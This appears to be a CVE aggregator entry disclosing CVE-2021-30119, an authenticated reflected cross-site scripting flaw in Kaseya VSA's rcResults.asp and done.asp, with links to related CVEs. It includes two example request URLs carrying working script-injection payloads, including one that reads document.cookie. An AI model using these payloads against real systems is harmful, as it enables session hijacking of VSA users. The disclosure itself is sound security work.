Authenticated reflective XSS in HelpDeskTab/rcResults.asp The parameter result of /HelpDeskTab/rcResults.asp is insecurely returned in the requested web page and can be used to perform a Cross Site Scripting attack Example request: `https://x.x.x.x/HelpDeskTab/rcResults.asp?result=<script>alert(document.cookie)</script>` The same is true for the parameter FileName of /done.asp Eaxmple request: `https://x.x.x.x/done.asp?FileName=";</script><script>alert(1);a="&PathData=&originalName=shell.aspx&FileSize=4388&TimeElapsed=00:00:00.078`
Use CWE-79, Kaseya vendor hub and Vsa product page to widen CVE-2021-30119 into its surrounding weakness, vendor, and product context.
Compare it with CVE-2021-30120, CVE-2021-30118 and CVE-2021-30117 for nearby disclosures in the same product family.